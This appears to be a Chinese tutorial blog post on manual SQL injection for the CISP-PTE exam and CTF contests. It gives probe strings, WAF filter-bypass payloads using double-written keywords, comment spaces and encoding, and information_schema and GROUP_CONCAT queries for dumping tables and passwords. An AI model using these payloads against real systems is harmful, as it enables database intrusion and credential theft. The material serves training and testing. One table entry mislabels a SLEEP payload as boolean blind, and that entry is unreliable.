为团队统一开发环境使用 Taotoken CLI 工具一键配置 API 密钥
2026/5/4 18:38:27
CISP-PTE SQL注入实战:手工注入的3个高效技巧与深度思考
在网络安全领域,SQL注入始终是最具破坏力的漏洞之一。虽然自动化工具如SQLMap能快速完成注入任务,但在某些CTF比赛或认证考试中,纯手工注入能力才是真正考验技术功底的试金石。本文将分享我在CISP-PTE认证考试中总结的三个高效手工注入技巧,帮助你在受限环境下依然能游刃有余。
1. 快速判断注入点类型与过滤规则
手工注入的第一步是准确识别注入点类型和系统实施的过滤规则。不同于自动化工具的盲扫,手工注入需要更敏锐的观察力和系统化的分析方法。
1.1 通过报错信息定位注入点
当系统开启错误回显时,精心构造的注入语句能直接暴露数据库结构和过滤机制。例如,在测试登录表单时,可以尝试以下经典探测语句:
admin' AND 1=1 -- admin' AND 1=2 --如果第一个语句返回正常而第二个返回异常,基本可以确认存在字符型注入。数字型注入则通常不需要单引号闭合。
常见注入点类型判断表:
| 注入类型 | 测试语句 | 预期反应 |
|---|---|---|
| 字符型 | ' AND '1'='1 | 正常返回 |
| 数字型 | AND 1=1 | 正常返回 |
| 布尔盲注 | ' AND SLEEP(5)-- | 延迟响应 |
| 时间盲注 | '; WAITFOR DELAY '0:0:5'-- | 延迟响应 |
1.2 分析过滤规则
现代Web应用通常会部署各种过滤机制来防御SQL注入。手工测试时需要系统性地探测被过滤的关键词和字符。例如:
尝试:admin' OR 1=1 -- 若失败,测试:admin' OR '1'='1 若仍失败,测试:admin' OORR 1=1 --通过这种渐进式测试,可以判断系统是否过滤了空格、注释符(-- #)、关键词(OR UNION等)以及过滤方式(完全匹配、大小写敏感、正则等)。
提示:在CTF环境中,过滤规则往往有规律可循,如只过滤特定关键词或字符组合。实际渗透测试中,过滤机制可能更复杂多变。
2. 手工绕过过滤的高级Payload构造
当确认存在注入点并了解过滤规则后,下一步就是构造能绕过防御的有效Payload。这需要创造性和对SQL语法的深入理解。
2.1 注释符的替代方案
许多系统会过滤传统注释符(--和#),但SQL支持多种注释方式:
/* 这是注释 */ -- 这也是注释 # MySQL风格注释 ;%00 Null字节截断在过滤严格的场景下,可以尝试这些变体:
admin' AND 1=1;%00 admin'/*绕过*/AND'1'='1 admin'-#-+- (过滤后变为--)2.2 空格的替代方案
空格是SQL语句的关键分隔符,但也是最常被过滤的字符之一。替代方案包括:
/**/ MySQL注释式空格 %09 水平制表符 %0A 换行符 %0C 换页符 %0D 回车符 %20 URL编码空格实际应用示例:
SELECT/**/username,password/**/FROM/**/users UNION%0ASELECT%0A1,2,32.3 关键词绕过技巧
当UNION、SELECT等关键词被过滤时,可以尝试以下方法:
- 大小写变形:
UnIoN SeLeCt - 双写绕过:
ununionion seselectlect - 内联注释:
/*!UNION*/ /*!SELECT*/ - 编码混淆:
%75%6E%69%6F%6E(UNION的URL编码) - 注释分割:
U/**/NI/**/ON
实战案例:
0')/**/ununionion/**/select/**/1,2,3,database()%23这个Payload同时使用了双写绕过(union→ununionion)、空格替代(/**/)和注释符(%23)。
3. 高效利用information_schema手工脱库
手工注入的终极目标是提取数据,而information_schema是MySQL中获取元数据的关键。掌握其高效使用方法能大幅提升手工注入效率。
3.1 information_schema核心表解析
MySQL的information_schema数据库包含几个关键表:
- TABLES:存储所有表信息
- COLUMNS:存储所有列信息
- SCHEMATA:存储数据库信息
- ROUTINES:存储存储过程和函数信息
常用查询示例:
-- 获取所有数据库名 SELECT schema_name FROM information_schema.schemata -- 获取当前数据库的表 SELECT table_name FROM information_schema.tables WHERE table_schema=database() -- 获取指定表的列 SELECT column_name FROM information_schema.columns WHERE table_schema='dbname' AND table_name='tablename'3.2 手工脱库实战技巧
在实际注入中,往往需要将多行结果合并显示,这时group_concat()函数就非常有用:
-- 获取所有表名(合并为一行) 1',(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()),'1')-- -- 获取users表的所有列 1',(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='users'),'1')-- -- 获取admin用户的密码 1',(SELECT password FROM users WHERE username='admin' LIMIT 1),'1')--注意:GROUP_CONCAT默认有长度限制(1024字节),可通过设置group_concat_max_len参数调整。
3.3 分页查询技巧
当数据量很大时,需要分页查询避免超长响应或截断:
-- 获取users表前5条记录 1',(SELECT username FROM users LIMIT 0,5),'1')-- -- 获取第6-10条记录 1',(SELECT username FROM users LIMIT 5,5),'1')--4. 手工注入与自动化工具的优劣对比
虽然SQLMap等自动化工具能快速完成注入任务,但手工注入在特定场景下具有不可替代的优势。
4.1 手工注入的独特优势
- 精准控制:能根据实时反馈调整Payload,避免盲目攻击
- 绕过能力:对复杂过滤规则的适应性更强
- 隐蔽性:产生的流量模式更接近正常请求
- 学习价值:深入理解SQL注入原理和防御机制
4.2 自动化工具的局限性
- 指纹明显:容易被WAF/IDS识别和拦截
- 适应性差:对非常规过滤规则往往无能为力
- 过度攻击:可能产生大量无效请求,引起警报
- 理解肤浅:使用者可能不了解底层原理
4.3 实际应用中的选择策略
| 场景 | 推荐方法 | 原因 |
|---|---|---|
| CTF比赛 | 手工注入 | 通常禁用自动化工具 |
| 渗透测试 | 结合使用 | 先手工确认,再用工具批量验证 |
| 认证考试 | 手工注入 | 考察核心能力 |
| 应急响应 | 手工注入 | 需要快速精准定位问题 |
在CISP-PTE等认证考试中,手工注入能力往往是必考项。例如,在遇到过滤特殊字符的题目时,我曾使用以下Payload成功绕过:
1')/**/ununionion/**/select/**/1,2,3,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='2web'/**/%23这个Payload综合运用了双写绕过、空格替代和注释技巧,成功获取了目标数据库的表信息。